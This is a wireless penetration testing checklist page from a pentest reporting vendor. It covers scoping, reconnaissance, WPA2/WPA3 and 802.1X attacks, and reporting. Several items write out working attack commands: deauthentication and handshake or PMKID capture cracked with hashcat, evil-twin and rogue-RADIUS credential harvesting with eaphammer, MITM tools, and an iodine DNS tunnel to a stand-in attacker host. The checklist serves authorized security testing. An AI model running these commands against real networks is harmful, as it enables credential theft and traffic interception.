Home
/Checklists
/Wireless Network Pentest Checklist

Infrastructure27 items

Wireless Network Pentest Checklist

A wireless network security testing checklist covering Wi-Fi infrastructure, authentication mechanisms, encryption protocols, rogue device detection, and client-side attacks. Applicable to enterprise, guest, and IoT wireless networks.

NIST SP 800-153NIST SP 800-115PCI DSS 11.1CIS Controls

Progress: 0 of 27 items

Identify all wireless networks and SSIDs in scopeinfo

Document corporate, guest, IoT, and any hidden wireless networks to be tested.

Obtain floor plans and identify physical testing locations

Map building layouts to plan testing positions and signal coverage areas.

Prepare wireless testing equipment (adapters, antennas, SDR)

Ensure monitor-mode capable adapters and directional antennas are available.

Confirm legal authorization for wireless signal interception

Ensure authorization covers wireless packet capture and deauthentication testing.

Document expected wireless security configurations (WPA2/WPA3, 802.1X)

Understand the intended security architecture for comparison during testing.

Scan and enumerate all wireless networks in the target areainfo

Use airodump-ng or Kismet to identify all SSIDs, BSSIDs, channels, and encryption types.

Commands

airmon-ng start wlan0

airodump-ng wlan0mon

References

NIST SP 800-153 - Guidelines for Securing WLANs
Aircrack-ng documentation

Identify hidden SSIDs through probe request analysislow

Monitor probe requests and responses to reveal hidden network names.

Commands

airodump-ng wlan0mon --essid-regex ".*"

Enumerate connected clients and their device typesinfo

Identify client MAC addresses, OUI vendors, and probe request patterns.

Commands

airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6

Map wireless signal coverage and identify signal bleed outside physical boundariesmedium

Test signal strength from parking lots, adjacent buildings, and public areas.

Detect rogue access points and unauthorized wireless deviceshigh

Compare discovered APs against the authorized AP inventory to identify rogues.

Identify the wireless controller and management interfacemedium

Locate the wireless LAN controller and check for accessible management portals.

Capture WPA2 four-way handshakes for offline crackinghigh

Perform targeted deauthentication to capture handshakes and crack PSK with hashcat.

Commands

airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture

aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt

Evidence to capture

PCAP of the captured EAPOL four-way handshake plus the hashcat session output showing the cracked PSK.

Test WPA2-Enterprise for EAP downgrade and credential capturecritical

Set up a rogue AP with hostapd-mana to test for PEAP/MSCHAPv2 credential capture.

Commands

hostapd-mana hostapd-mana.conf

eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds

Evidence to capture

eaphammer or hostapd-mana log showing a captured MSCHAPv2 challenge/response, plus the cracked plaintext credentials from asleap or hashcat.

Test for PMKID-based attacks on WPA2 networkshigh

Capture PMKID from AP association responses for offline PSK cracking without deauthentication.

Commands

hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

hcxpcapngtool -o hash.hc22000 pmkid.pcapng

hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Verify WPA3-SAE implementation and test for downgrade attackshigh

Check for WPA3 transition mode vulnerabilities and Dragonblood attack susceptibility.

References

Dragonblood - WPA3 vulnerabilities

Test guest network captive portal for authentication bypassmedium

Attempt MAC spoofing, DNS tunneling, and portal bypass to access the network without authentication.

Commands

macchanger -m AA:BB:CC:DD:EE:FF wlan0

iodine -P password tunnel.attacker.com

Verify 802.1X certificate validation on client devicescritical

Test whether clients accept rogue RADIUS server certificates without proper validation.

Commands

eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds --cert-wizard

Deploy evil twin access point to capture client credentialscritical

Create a convincing rogue AP with matching SSID to harvest credentials from connecting clients.

Commands

airbase-ng -e CorpWiFi -c 6 wlan0mon

eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds

Evidence to capture

screenshot of the evil-twin SSID broadcast, captured connection from a target client, and the harvested credentials or session cookies.

Test network segmentation between wireless and wired networkshigh

Verify that wireless clients cannot access restricted wired network segments.

Commands

nmap -sS -Pn <internal_target_range>

Perform man-in-the-middle attacks on wireless clientshigh

Use ARP spoofing or rogue AP to intercept traffic and test for sensitive data exposure.

Commands

bettercap -iface wlan0

mitm6 -d corp.local

Test for client isolation on guest and shared networksmedium

Verify that clients on the same wireless network cannot communicate directly with each other.

Commands

arp-scan --interface=wlan0 --localnet

Attempt lateral movement from wireless network to internal resourceshigh

Test whether wireless network access enables reaching internal servers, databases, or management systems.

Document wireless coverage maps and signal bleed areas

Include heat maps showing signal strength outside physical security perimeters.

Report all rogue devices and unauthorized wireless networks found

Provide MAC addresses, locations, and risk assessment for each rogue device.

Provide wireless security hardening recommendations

Recommend WPA3 migration, RADIUS certificate pinning, and wireless IDS/IPS deployment.

Document cracked PSK passwords and enterprise credential captures

Report password quality issues and recommend rotation and complexity improvements.

Remove rogue access points and testing artifacts from the environment

Shut down all evil twin APs and remove any rogue devices deployed during testing.

Related Vulnerabilities

Cryptographic Failures

high

Identification and Authentication Failures

high

Security Misconfiguration

medium

Industries Using This Checklist

Financial Services & Banking

Healthcare

Report Vulnerabilities Faster with Vulnsy

Stop rewriting the same findings. Use Vulnsy's reusable templates, collaborative workflows, and professional report generation to deliver pentest reports 10x faster.

Start Free Trial

Modern penetration testing reporting platform. Built by pentesters, for pentesters.

Platform

Features
Pricing
FAQ

Resources

Vulnerability Knowledge Base
Pentest Checklists
Cybersecurity Glossary
Industries
Blog
Free Tools

Company

About
Contact
luke@vulnsy.com

Wireless Network Pentest Checklist

Pre-Engagement

Reconnaissance

Authentication & Encryption Testing

Exploitation & Post-Access

Reporting

Related Vulnerabilities

Industries Using This Checklist

Report Vulnerabilities Faster with Vulnsy